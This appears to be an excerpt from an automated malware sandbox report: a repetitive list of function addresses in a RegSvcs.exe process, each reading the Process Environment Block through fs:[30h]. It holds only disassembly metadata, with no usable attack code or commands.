          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0175C460 mov ecx, dword ptr fs:[00000030h]14_2_0175C460
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016FA470 mov eax, dword ptr fs:[00000030h]14_2_016FA470
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016FA470 mov eax, dword ptr fs:[00000030h]14_2_016FA470
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016FA470 mov eax, dword ptr fs:[00000030h]14_2_016FA470
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0178A456 mov eax, dword ptr fs:[00000030h]14_2_0178A456
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016C645D mov eax, dword ptr fs:[00000030h]14_2_016C645D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170E443 mov eax, dword ptr fs:[00000030h]14_2_0170E443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170E443 mov eax, dword ptr fs:[00000030h]14_2_0170E443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170E443 mov eax, dword ptr fs:[00000030h]14_2_0170E443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170E443 mov eax, dword ptr fs:[00000030h]14_2_0170E443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170E443 mov eax, dword ptr fs:[00000030h]14_2_0170E443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170E443 mov eax, dword ptr fs:[00000030h]14_2_0170E443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170E443 mov eax, dword ptr fs:[00000030h]14_2_0170E443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170E443 mov eax, dword ptr fs:[00000030h]14_2_0170E443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016F245A mov eax, dword ptr fs:[00000030h]14_2_016F245A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170A430 mov eax, dword ptr fs:[00000030h]14_2_0170A430
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016CC427 mov eax, dword ptr fs:[00000030h]14_2_016CC427
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016CE420 mov eax, dword ptr fs:[00000030h]14_2_016CE420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016CE420 mov eax, dword ptr fs:[00000030h]14_2_016CE420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016CE420 mov eax, dword ptr fs:[00000030h]14_2_016CE420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01756420 mov eax, dword ptr fs:[00000030h]14_2_01756420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01756420 mov eax, dword ptr fs:[00000030h]14_2_01756420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01756420 mov eax, dword ptr fs:[00000030h]14_2_01756420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01756420 mov eax, dword ptr fs:[00000030h]14_2_01756420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01756420 mov eax, dword ptr fs:[00000030h]14_2_01756420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01756420 mov eax, dword ptr fs:[00000030h]14_2_01756420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01756420 mov eax, dword ptr fs:[00000030h]14_2_01756420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01708402 mov eax, dword ptr fs:[00000030h]14_2_01708402
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01708402 mov eax, dword ptr fs:[00000030h]14_2_01708402
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01708402 mov eax, dword ptr fs:[00000030h]14_2_01708402
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D04E5 mov ecx, dword ptr fs:[00000030h]14_2_016D04E5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017044B0 mov ecx, dword ptr fs:[00000030h]14_2_017044B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0175A4B0 mov eax, dword ptr fs:[00000030h]14_2_0175A4B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D64AB mov eax, dword ptr fs:[00000030h]14_2_016D64AB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0178A49A mov eax, dword ptr fs:[00000030h]14_2_0178A49A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D8770 mov eax, dword ptr fs:[00000030h]14_2_016D8770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E0770 mov eax, dword ptr fs:[00000030h]14_2_016E0770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E0770 mov eax, dword ptr fs:[00000030h]14_2_016E0770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E0770 mov eax, dword ptr fs:[00000030h]14_2_016E0770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E0770 mov eax, dword ptr fs:[00000030h]14_2_016E0770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E0770 mov eax, dword ptr fs:[00000030h]14_2_016E0770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E0770 mov eax, dword ptr fs:[00000030h]14_2_016E0770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E0770 mov eax, dword ptr fs:[00000030h]14_2_016E0770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E0770 mov eax, dword ptr fs:[00000030h]14_2_016E0770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E0770 mov eax, dword ptr fs:[00000030h]14_2_016E0770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E0770 mov eax, dword ptr fs:[00000030h]14_2_016E0770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E0770 mov eax, dword ptr fs:[00000030h]14_2_016E0770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E0770 mov eax, dword ptr fs:[00000030h]14_2_016E0770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01754755 mov eax, dword ptr fs:[00000030h]14_2_01754755
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01712750 mov eax, dword ptr fs:[00000030h]14_2_01712750
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01712750 mov eax, dword ptr fs:[00000030h]14_2_01712750
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0175E75D mov eax, dword ptr fs:[00000030h]14_2_0175E75D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D0750 mov eax, dword ptr fs:[00000030h]14_2_016D0750
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170674D mov esi, dword ptr fs:[00000030h]14_2_0170674D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170674D mov eax, dword ptr fs:[00000030h]14_2_0170674D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170674D mov eax, dword ptr fs:[00000030h]14_2_0170674D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0174C730 mov eax, dword ptr fs:[00000030h]14_2_0174C730
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170273C mov eax, dword ptr fs:[00000030h]14_2_0170273C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170273C mov ecx, dword ptr fs:[00000030h]14_2_0170273C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170273C mov eax, dword ptr fs:[00000030h]14_2_0170273C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170C720 mov eax, dword ptr fs:[00000030h]14_2_0170C720
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170C720 mov eax, dword ptr fs:[00000030h]14_2_0170C720
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01700710 mov eax, dword ptr fs:[00000030h]14_2_01700710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170C700 mov eax, dword ptr fs:[00000030h]14_2_0170C700
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D0710 mov eax, dword ptr fs:[00000030h]14_2_016D0710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016F27ED mov eax, dword ptr fs:[00000030h]14_2_016F27ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016F27ED mov eax, dword ptr fs:[00000030h]14_2_016F27ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016F27ED mov eax, dword ptr fs:[00000030h]14_2_016F27ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0175E7E1 mov eax, dword ptr fs:[00000030h]14_2_0175E7E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D47FB mov eax, dword ptr fs:[00000030h]14_2_016D47FB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D47FB mov eax, dword ptr fs:[00000030h]14_2_016D47FB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016DC7C0 mov eax, dword ptr fs:[00000030h]14_2_016DC7C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017507C3 mov eax, dword ptr fs:[00000030h]14_2_017507C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D07AF mov eax, dword ptr fs:[00000030h]14_2_016D07AF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017847A0 mov eax, dword ptr fs:[00000030h]14_2_017847A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0177678E mov eax, dword ptr fs:[00000030h]14_2_0177678E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01702674 mov eax, dword ptr fs:[00000030h]14_2_01702674
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170A660 mov eax, dword ptr fs:[00000030h]14_2_0170A660
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170A660 mov eax, dword ptr fs:[00000030h]14_2_0170A660
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0179866E mov eax, dword ptr fs:[00000030h]14_2_0179866E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0179866E mov eax, dword ptr fs:[00000030h]14_2_0179866E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016EC640 mov eax, dword ptr fs:[00000030h]14_2_016EC640
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D262C mov eax, dword ptr fs:[00000030h]14_2_016D262C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016EE627 mov eax, dword ptr fs:[00000030h]14_2_016EE627
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01706620 mov eax, dword ptr fs:[00000030h]14_2_01706620
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01708620 mov eax, dword ptr fs:[00000030h]14_2_01708620
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E260B mov eax, dword ptr fs:[00000030h]14_2_016E260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E260B mov eax, dword ptr fs:[00000030h]14_2_016E260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E260B mov eax, dword ptr fs:[00000030h]14_2_016E260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E260B mov eax, dword ptr fs:[00000030h]14_2_016E260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E260B mov eax, dword ptr fs:[00000030h]14_2_016E260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E260B mov eax, dword ptr fs:[00000030h]14_2_016E260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E260B mov eax, dword ptr fs:[00000030h]14_2_016E260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01712619 mov eax, dword ptr fs:[00000030h]14_2_01712619
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0174E609 mov eax, dword ptr fs:[00000030h]14_2_0174E609
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017506F1 mov eax, dword ptr fs:[00000030h]14_2_017506F1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017506F1 mov eax, dword ptr fs:[00000030h]14_2_017506F1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0174E6F2 mov eax, dword ptr fs:[00000030h]14_2_0174E6F2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0174E6F2 mov eax, dword ptr fs:[00000030h]14_2_0174E6F2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0174E6F2 mov eax, dword ptr fs:[00000030h]14_2_0174E6F2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0174E6F2 mov eax, dword ptr fs:[00000030h]14_2_0174E6F2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170A6C7 mov ebx, dword ptr fs:[00000030h]14_2_0170A6C7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170A6C7 mov eax, dword ptr fs:[00000030h]14_2_0170A6C7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017066B0 mov eax, dword ptr fs:[00000030h]14_2_017066B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170C6A6 mov eax, dword ptr fs:[00000030h]14_2_0170C6A6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D4690 mov eax, dword ptr fs:[00000030h]14_2_016D4690
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D4690 mov eax, dword ptr fs:[00000030h]14_2_016D4690
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0175C97C mov eax, dword ptr fs:[00000030h]14_2_0175C97C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016F6962 mov eax, dword ptr fs:[00000030h]14_2_016F6962
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016F6962 mov eax, dword ptr fs:[00000030h]14_2_016F6962
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016F6962 mov eax, dword ptr fs:[00000030h]14_2_016F6962
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01774978 mov eax, dword ptr fs:[00000030h]14_2_01774978
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01774978 mov eax, dword ptr fs:[00000030h]14_2_01774978
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0171096E mov eax, dword ptr fs:[00000030h]14_2_0171096E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0171096E mov edx, dword ptr fs:[00000030h]14_2_0171096E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0171096E mov eax, dword ptr fs:[00000030h]14_2_0171096E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01750946 mov eax, dword ptr fs:[00000030h]14_2_01750946
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017A4940 mov eax, dword ptr fs:[00000030h]14_2_017A4940
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0176892B mov eax, dword ptr fs:[00000030h]14_2_0176892B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0175892A mov eax, dword ptr fs:[00000030h]14_2_0175892A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0175C912 mov eax, dword ptr fs:[00000030h]14_2_0175C912
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016C8918 mov eax, dword ptr fs:[00000030h]14_2_016C8918
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016C8918 mov eax, dword ptr fs:[00000030h]14_2_016C8918
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0174E908 mov eax, dword ptr fs:[00000030h]14_2_0174E908
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0174E908 mov eax, dword ptr fs:[00000030h]14_2_0174E908
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017029F9 mov eax, dword ptr fs:[00000030h]14_2_017029F9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017029F9 mov eax, dword ptr fs:[00000030h]14_2_017029F9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0175E9E0 mov eax, dword ptr fs:[00000030h]14_2_0175E9E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017049D0 mov eax, dword ptr fs:[00000030h]14_2_017049D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0179A9D3 mov eax, dword ptr fs:[00000030h]14_2_0179A9D3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017669C0 mov eax, dword ptr fs:[00000030h]14_2_017669C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016DA9D0 mov eax, dword ptr fs:[00000030h]14_2_016DA9D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016DA9D0 mov eax, dword ptr fs:[00000030h]14_2_016DA9D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016DA9D0 mov eax, dword ptr fs:[00000030h]14_2_016DA9D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016DA9D0 mov eax, dword ptr fs:[00000030h]14_2_016DA9D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016DA9D0 mov eax, dword ptr fs:[00000030h]14_2_016DA9D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016DA9D0 mov eax, dword ptr fs:[00000030h]14_2_016DA9D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D09AD mov eax, dword ptr fs:[00000030h]14_2_016D09AD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D09AD mov eax, dword ptr fs:[00000030h]14_2_016D09AD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017589B3 mov esi, dword ptr fs:[00000030h]14_2_017589B3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017589B3 mov eax, dword ptr fs:[00000030h]14_2_017589B3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017589B3 mov eax, dword ptr fs:[00000030h]14_2_017589B3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E29A0 mov eax, dword ptr fs:[00000030h]14_2_016E29A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E29A0 mov eax, dword ptr fs:[00000030h]14_2_016E29A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E29A0 mov eax, dword ptr fs:[00000030h]14_2_016E29A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E29A0 mov eax, dword ptr fs:[00000030h]14_2_016E29A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E29A0 mov eax, dword ptr fs:[00000030h]14_2_016E29A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E29A0 mov eax, dword ptr fs:[00000030h]14_2_016E29A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E29A0 mov eax, dword ptr fs:[00000030h]14_2_016E29A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E29A0 mov eax, dword ptr fs:[00000030h]14_2_016E29A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E29A0 mov eax, dword ptr fs:[00000030h]14_2_016E29A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E29A0 mov eax, dword ptr fs:[00000030h]14_2_016E29A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E29A0 mov eax, dword ptr fs:[00000030h]14_2_016E29A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E29A0 mov eax, dword ptr fs:[00000030h]14_2_016E29A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E29A0 mov eax, dword ptr fs:[00000030h]14_2_016E29A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01766870 mov eax, dword ptr fs:[00000030h]14_2_01766870
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01766870 mov eax, dword ptr fs:[00000030h]14_2_01766870
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0175E872 mov eax, dword ptr fs:[00000030h]14_2_0175E872
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0175E872 mov eax, dword ptr fs:[00000030h]14_2_0175E872
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01700854 mov eax, dword ptr fs:[00000030h]14_2_01700854
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E2840 mov ecx, dword ptr fs:[00000030h]14_2_016E2840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D4859 mov eax, dword ptr fs:[00000030h]14_2_016D4859
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D4859 mov eax, dword ptr fs:[00000030h]14_2_016D4859
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170A830 mov eax, dword ptr fs:[00000030h]14_2_0170A830
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0177483A mov eax, dword ptr fs:[00000030h]14_2_0177483A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0177483A mov eax, dword ptr fs:[00000030h]14_2_0177483A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016F2835 mov eax, dword ptr fs:[00000030h]14_2_016F2835
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016F2835 mov eax, dword ptr fs:[00000030h]14_2_016F2835
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016F2835 mov eax, dword ptr fs:[00000030h]14_2_016F2835
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016F2835 mov ecx, dword ptr fs:[00000030h]14_2_016F2835
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016F2835 mov eax, dword ptr fs:[00000030h]14_2_016F2835
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016F2835 mov eax, dword ptr fs:[00000030h]14_2_016F2835
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0175C810 mov eax, dword ptr fs:[00000030h]14_2_0175C810
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170C8F9 mov eax, dword ptr fs:[00000030h]14_2_0170C8F9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170C8F9 mov eax, dword ptr fs:[00000030h]14_2_0170C8F9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0179A8E4 mov eax, dword ptr fs:[00000030h]14_2_0179A8E4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016FE8C0 mov eax, dword ptr fs:[00000030h]14_2_016FE8C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017A08C0 mov eax, dword ptr fs:[00000030h]14_2_017A08C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0175C89D mov eax, dword ptr fs:[00000030h]14_2_0175C89D
